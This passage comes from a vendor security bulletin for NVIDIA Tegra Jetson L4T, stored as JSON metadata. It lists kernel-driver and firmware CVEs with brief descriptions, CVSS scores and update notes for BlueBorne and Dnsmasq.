Score: 6.7 \nCVSS Vector: CVSS:3.0/[AV:L/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2017-6273\n\nNVIDIA ADSP Firmware contains a vulnerability in the ADSP Loader component where there is the potential to write to a memory location that is outside the intended boundary of the buffer, which may lead to denial of service or possible escalation of privileges.\n\nCVSS Base Score: 7.3 \nCVSS Temporal Score: 6.4 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:L/E:U/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:L/E:U/RL:O/RC:C>)\n\n#### CVE-2016-8395\n\nNVIDIA Tegra kernel driver contains a vulnerability in NVIDIA Camera where the buffer being overwritten is allocated on the stack, which may lead to a local permanent denial of service or possible escalation of privileges.\n\nCVSS Base Score: 7.2 \nCVSS Temporal Score: 6.5 \nCVSS Vector: CVSS:3.0/[AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C/CR:H/IR:H/AR:H/MAV:P/MAC:H/MPR:H/MUI:R/MS:C/MC:H/MI:H/MA:H>)\n\n#### CVE-2016-8400\n\nNVIDIA OpenMax Component contains a vulnerability in `LIBNVRM` where there is the potential to read or write a buffer using an index or pointer that references a memory location after the end of the buffer, which may lead to a denial of service or possible escalation of privileges.\n\nCVSS Base Score: 7.1 \nCVSS Temporal Score: 6.4 \nCVSS Vector: CVSS:3.0/[AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-8449\n\nNVIDIA Tegra kernel driver contains a vulnerability in `NVMAP` where referencing memory after it has been freed may lead to denial of 
service or possible escalation of privileges.\n\nCVSS Base Score: 7.0 \nCVSS Temporal Score: 6.3 \nCVSS Vector: CVSS:3.0/[AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2017-0332\n\nNVIDIA Tegra kernel driver contains a vulnerability in NVIDIA `cryptodev` where the buffer that can be overwritten is allocated in the heap portion of memory, which may lead to a denial of service or possible escalation of privileges.\n\nCVSS Base Score: 6.7 \nCVSS Temporal Score: 5.8 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C>)\n\n#### CVE-2016-3873\n\nNVIDIA Tegra Kernel Driver contains a vulnerability where the DVS Framework does not validate or incorrectly validates input that can affect the control flow or data flow of a program, which may lead to a possible escalation of privileges.\n\nCVSS Base Score: 6.5 \nCVSS Temporal Score: 5.9 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-3930\n\nNVIDIA Tegra Kernel Driver contains a vulnerability in MMC Driver where the application dereferences a pointer that it expects to be valid but is `NULL`, which may lead to a denial of service or possible escalation of privileges.\n\nCVSS Base Score: 5.1 \nCVSS Temporal Score: 4.6 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N/E:P/RL:O/RC:C>)\n\n#### CVE-2016-8397\n\nNVIDIA Tegra kernel driver contains a vulnerability in `NVMAP` where uninitialized stack memory may be leaked to the user, which may lead to possible information 
disclosure.\n\nCVSS Base Score: 4.3 \nCVSS Temporal Score: 3.9 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N/E:P/RL:O/RC:C>)\n\n#### CVE-2017-1000251 and CVE-2017-1000250\n\nJetson L4T has addressed Linux vulnerabilities that have been referred to as \u201cBlueBorne.\u201d For more information about these issues, visit the Ubuntu\u00ae website.\n\n#### CVE-2017-14491, CVE-2017-14492, CVE-2017-14493, CVE-2017-14494, CVE-2017-14495 and CVE-2017-14496\n\nJetson L4T has addressed several Linux vulnerabilities in Dnsmasq. For more information about these issues visit the Ubuntu\u00ae website.\n\n_NVIDIA\u2019s risk assessment is based on an average of risk across a diverse set of installed systems and may not represent the true risk of your local installation. NVIDIA recommends consulting a security or IT professional to evaluate the risk of your specific configuration. NVIDIA doesn\u2019t know of any exploits to these issues at this time._\n", "modified": "2017-10-25T20:37:00", "published": "2017-10-16T00:00:00", "id": "NVIDIA:4561", "href": "http://nvidia.custhelp.com/app/answers/detail/a_id/4561", "type": "nvidia", "title": "Security Bulletin: NVIDIA Tegra Jetson L4T contains multiple vulnerabilities; updates for \u201cBlueBorne\u201d and \u201cDnsmasq\u201d.", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}